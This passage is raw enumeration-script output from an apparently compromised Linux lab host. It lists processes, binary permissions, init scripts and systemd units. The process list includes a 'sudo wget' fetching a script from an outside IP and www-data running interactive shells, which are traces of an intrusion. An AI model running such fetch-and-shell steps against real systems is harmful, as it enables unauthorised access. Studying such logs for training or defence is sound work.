Ss+ 02:31 0:00 /bin/bash root 101320 0.0 0.2 107984 7192 ? Ss 02:33 0:00 sshd: robert [priv] robert 101468 0.0 0.1 108120 4488 ? 
S 02:33 0:00 sshd: robert@pts/8 robert 101476 0.0 0.1 21460 5380 pts/8 Ss+ 02:33 0:00 -bash root 105982 0.0 0.1 62224 3972 tty1 S 03:36 0:00 sudo wget 10.10.14.41:4400/crackme.py www-data 109980 0.0 0.0 4628 1632 tty1 S 03:37 0:00 /bin/sh -i www-data 110200 0.0 0.1 20180 3608 pts/9 Ss 02:41 0:00 /bin/bash www-data 110339 0.0 0.3 35188 9416 pts/9 S+ 02:41 0:00 python3 www-data 110434 0.0 0.1 20180 3800 pts/10 Ss 02:41 0:00 /bin/bash www-data 110962 0.0 0.8 95836 24276 pts/10 S+ 02:41 0:00 python3 www-data 127337 0.0 0.1 20180 3588 pts/13 Ss 03:06 0:00 /bin/bash www-data 127473 0.0 0.3 35188 9368 pts/13 S+ 03:07 0:00 python3 [-] Process binaries and associated permissions (from above list): 1.1M -rwxr-xr-x 1 root root 1.1M Jun 6 2019 /bin/bash 0 lrwxrwxrwx 1 root root 4 Aug 5 19:23 /bin/sh -> dash 1.6M -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 /lib/systemd/systemd 128K -rwxr-xr-x 1 root root 127K Sep 5 03:59 /lib/systemd/systemd-journald 216K -rwxr-xr-x 1 root root 215K Sep 5 03:59 /lib/systemd/systemd-logind 1.6M -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 /lib/systemd/systemd-networkd 372K -rwxr-xr-x 1 root root 371K Sep 5 03:59 /lib/systemd/systemd-resolved 40K -rwxr-xr-x 1 root root 39K Sep 5 03:59 /lib/systemd/systemd-timesyncd 572K -rwxr-xr-x 1 root root 571K Sep 5 03:59 /lib/systemd/systemd-udevd 56K -rwxr-xr-x 1 root root 56K Oct 15 2018 /sbin/agetty 0 lrwxrwxrwx 1 root root 20 Sep 5 03:59 /sbin/init -> /lib/systemd/systemd 84K -rwxr-xr-x 1 root root 83K Jun 4 2019 /sbin/lvmetad 232K -rwxr-xr-x 1 root root 232K Jun 10 2019 /usr/bin/dbus-daemon 20K -rwxr-xr-x 1 root root 19K Nov 23 2018 /usr/bin/lxcfs 0 lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6 124K -rwxr-xr-x 1 root root 123K May 14 2019 /usr/bin/VGAuthService 52K -rwxr-xr-x 1 root root 51K May 14 2019 /usr/bin/vmtoolsd 180K -rwxr-xr-x 1 root root 179K Dec 18 2017 /usr/lib/accountsservice/accounts-daemon 16K -rwxr-xr-x 1 root root 15K Mar 27 2019 /usr/lib/policykit-1/polkitd 16M -rwxr-xr-x 
1 root root 17M Jun 5 2019 /usr/lib/snapd/snapd 28K -rwxr-xr-x 1 root root 27K Feb 20 2018 /usr/sbin/atd 48K -rwxr-xr-x 1 root root 47K Nov 16 2017 /usr/sbin/cron 64K -rwxr-xr-x 1 root root 63K Jan 9 2019 /usr/sbin/irqbalance 668K -rwxr-xr-x 1 root root 665K Apr 24 2018 /usr/sbin/rsyslogd 772K -rwxr-xr-x 1 root root 769K Mar 4 2019 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 176 drwxr-xr-x 2 root root 4096 Nov 25 11:05 . drwxr-xr-x 91 root root 4096 Dec 2 09:52 .. -rwxr-xr-x 1 root root 2269 Apr 22 2017 acpid -rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor -rwxr-xr-x 1 root root 2802 Nov 20 2017 apport -rwxr-xr-x 1 root root 1071 Aug 21 2015 atd -rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh -rwxr-xr-x 1 root root 3049 Nov 16 2017 cron -rwxr-xr-x 1 root root 937 Mar 18 2018 cryptdisks -rwxr-xr-x 1 root root 978 Mar 18 2018 cryptdisks-early -rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus -rwxr-xr-x 1 root root 4489 Jun 28 2018 ebtables -rwxr-xr-x 1 root root 985 Mar 18 2019 grub-common -rwxr-xr-x 1 root root 3809 Feb 14 2018 hwclock.sh -rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance -rwxr-xr-x 1 root root 1503 Dec 12 2018 iscsid -rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh -rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod -rwxr-xr-x 1 root root 695 Dec 3 2017 lvm2 -rwxr-xr-x 1 root root 571 Dec 3 2017 lvm2-lvmetad -rwxr-xr-x 1 root root 586 Dec 3 2017 lvm2-lvmpolld -rwxr-xr-x 1 root root 2378 Nov 23 2018 lxcfs -rwxr-xr-x 1 root root 2240 Nov 23 2018 lxd -rwxr-xr-x 1 root root 2653 Jan 30 2019 mdadm -rwxr-xr-x 1 root root 1249 Jan 30 2019 mdadm-waitidle -rwxr-xr-x 1 root root 4597 Nov 25 2016 networking -rwxr-xr-x 1 root root 2503 Dec 12 2018 open-iscsi -rwxr-xr-x 1 root root 1846 Apr 5 2019 open-vm-tools -rwxr-xr-x 1 root root 1366 Apr 4 2019 plymouth -rwxr-xr-x 1 root root 752 Apr 4 2019 plymouth-log -rwxr-xr-x 1 root root 1191 Jan 17 2018 procps -rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync -rwxr-xr-x 1 root root 2864 Jan 14 2018 
rsyslog -rwxr-xr-x 1 root root 1222 May 21 2017 screen-cleanup -rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh -rwxr-xr-x 1 root root 5974 Apr 20 2018 udev -rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw -rwxr-xr-x 1 root root 1391 Apr 29 2019 unattended-upgrades -rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd [-] /lib/systemd/* config file permissions: /lib/systemd/: total 7.3M drwxr-xr-x 22 root root 40K Nov 25 11:05 system drwxr-xr-x 2 root root 4.0K Sep 24 22:08 system-generators drwxr-xr-x 2 root root 4.0K Sep 24 22:08 system-preset drwxr-xr-x 2 root root 4.0K Sep 24 22:08 network -rw-r--r-- 1 root root 2.3M Sep 5 03:59 libsystemd-shared-237.so -rw-r--r-- 1 root root 699 Sep 5 03:59 resolv.conf -rwxr-xr-x 1 root root 1.3K Sep 5 03:59 set-cpufreq -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 systemd -rwxr-xr-x 1 root root 6.0K Sep 5 03:59 systemd-ac-power -rwxr-xr-x 1 root root 18K Sep 5 03:59 systemd-backlight -rwxr-xr-x 1 root root 11K Sep 5 03:59 systemd-binfmt -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-cgroups-agent -rwxr-xr-x 1 root root 22K Sep 5 03:59 systemd-cryptsetup -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-dissect -rwxr-xr-x 1 root root 18K Sep 5 03:59 systemd-fsck -rwxr-xr-x 1 root root 23K Sep 5 03:59 systemd-fsckd -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-growfs -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-hibernate-resume -rwxr-xr-x 1 root root 23K Sep 5 03:59 systemd-hostnamed -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-initctl -rwxr-xr-x 1 root root 127K Sep 5 03:59 systemd-journald -rwxr-xr-x 1 root root 35K Sep 5 03:59 systemd-localed -rwxr-xr-x 1 root root 215K Sep 5 03:59 systemd-logind -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-makefs -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-modules-load -rwxr-xr-x 1 root root 1.6M Sep 5 03:59 systemd-networkd -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-networkd-wait-online -rwxr-xr-x 1 root root 11K Sep 5 03:59 systemd-quotacheck -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-random-seed 
-rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-remount-fs -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-reply-password -rwxr-xr-x 1 root root 371K Sep 5 03:59 systemd-resolved -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-rfkill -rwxr-xr-x 1 root root 43K Sep 5 03:59 systemd-shutdown -rwxr-xr-x 1 root root 19K Sep 5 03:59 systemd-sleep -rwxr-xr-x 1 root root 23K Sep 5 03:59 systemd-socket-proxyd -rwxr-xr-x 1 root root 11K Sep 5 03:59 systemd-sulogin-shell -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-sysctl -rwxr-xr-x 1 root root 27K Sep 5 03:59 systemd-timedated -rwxr-xr-x 1 root root 39K Sep 5 03:59 systemd-timesyncd -rwxr-xr-x 1 root root 571K Sep 5 03:59 systemd-udevd -rwxr-xr-x 1 root root 15K Sep 5 03:59 systemd-update-utmp -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-user-sessions -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-veritysetup -rwxr-xr-x 1 root root 10K Sep 5 03:59 systemd-volatile-root drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-sleep drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-shutdown -rwxr-xr-x 1 root root 1.3K Jul 22 16:45 systemd-sysv-install /lib/systemd/system: total 1020K drwxr-xr-x 2 root root 4.0K Sep 24 22:08 multi-user.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 rescue.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 sockets.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 timers.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 getty.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 graphical.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Sep 24 22:08 rc-local.service.d drwxr-xr-x 2 root root 4.0K Sep 24 22:08 user@.service.d lrwxrwxrwx 1 root root 14 Sep 5 03:59 autovt@.service -> getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 bootlogs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 
bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 checkroot-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 checkroot.service -> /dev/null -rw-r--r-- 1 root root 1.1K Sep 5 03:59 console-getty.service -rw-r--r-- 1 root root 1.3K Sep 5 03:59 container-getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Sep 5 03:59 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Sep 5 03:59 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Sep 5 03:59 dbus-org.freedesktop.locale1.service -> systemd-localed.service lrwxrwxrwx 1 root root 22 Sep 5 03:59 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 25 Sep 5 03:59 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service -rw-r--r-- 1 root root 1.1K Sep 5 03:59 debug-shell.service lrwxrwxrwx 1 root root 16 Sep 5 03:59 default.target -> graphical.target -rw-r--r-- 1 root root 797 Sep 5 03:59 emergency.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 fuse.service -> /dev/null -rw-r--r-- 1 root root 2.0K Sep 5 03:59 getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 hwclock.service -> /dev/null -rw-r--r-- 1 root root 670 Sep 5 03:59 initrd-cleanup.service -rw-r--r-- 1 root root 830 Sep 5 03:59 initrd-parse-etc.service -rw-r--r-- 1 root root 589 Sep 5 03:59 initrd-switch-root.service -rw-r--r-- 1 root root 704 Sep 5 03:59 initrd-udevadm-cleanup-db.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 killprocs.service -> /dev/null lrwxrwxrwx 1 root root 28 Sep 5 03:59 kmod.service -> systemd-modules-load.service -rw-r--r-- 1 root root 717 Sep 5 03:59 kmod-static-nodes.service lrwxrwxrwx 1 
root root 28 Sep 5 03:59 module-init-tools.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 mountnfs.service -> /dev/null lrwxrwxrwx 1 root root 22 Sep 5 03:59 procps.service -> systemd-sysctl.service -rw-r--r-- 1 root root 609 Sep 5 03:59 quotaon.service -rw-r--r-- 1 root root 716 Sep 5 03:59 rc-local.service lrwxrwxrwx 1 root root 16 Sep 5 03:59 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 reboot.service -> /dev/null -rw-r--r-- 1 root root 788 Sep 5 03:59 rescue.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Sep 5 03:59 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Sep 5 03:59 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Sep 5 03:59 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Sep 5 03:59 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Sep 5 03:59 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Sep 5 03:59 runlevel5.target -> graphical.target lrwxrwxrwx 1 root root 13 Sep 5 03:59 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Sep 5 03:59 sendsigs.service -> /dev/null -rw-r--r-- 1 root root 1.5K Sep 5 03:59 serial-getty@.service lrwxrwxrwx 1 root root 9 Sep 5 03:59 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Sep 5 03:59 
stop-bootlogd-single.service -> /dev/null -rw-r--r-- 1 root root 554 Sep 5 03:59 suspend-then-hibernate.target -rw-r--r-- 1 root root 724 Sep 5 03:59 systemd-ask-password-console.service -rw-r--r-- 1 root root 752 Sep 5 03:59 systemd-ask-password-wall.service -rw-r--r-- 1 root root 752 Sep 5 03:59 systemd-backlight@.service -rw-r--r-- 1 root root 999 Sep 5 03:59 systemd-binfmt.service -rw-r--r-- 1 root root 537 Sep 5 03:59 systemd-exit.service -rw-r--r-- 1 root root 551 Sep 5 03:59 systemd-fsckd.service -rw-r--r-- 1 root root 540 Sep 5 03:59 systemd-fsckd.socket -rw-r--r-- 1 root root 714 Sep 5 03:59 systemd-fsck-root.service -rw-r--r-- 1 root root 715 Sep 5 03:59 systemd-fsck@.service -rw-r--r-- 1 root root 584 Sep 5 03:59 systemd-halt.service -rw-r--r-- 1 root root 671 Sep 5 03:59 systemd-hibernate-resume@.service -rw-r--r-- 1 root root 541 Sep 5 03:59 systemd-hibernate.service -rw-r--r-- 1 root root 1.1K Sep 5 03:59 systemd-hostnamed.service -rw-r--r-- 1 root root 818 Sep 5 03:59 systemd-hwdb-update.service -rw-r--r-- 1 root root 559 Sep 5 03:59 systemd-hybrid-sleep.service -rw-r--r-- 1 root root 551 Sep 5 03:59 systemd-initctl.service -rw-r--r-- 1 root root 686 Sep 5 03:59 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.6K Sep 5 03:59 systemd-journald.service -rw-r--r-- 1 root root 771 Sep 5 03:59 systemd-journal-flush.service -rw-r--r-- 1 |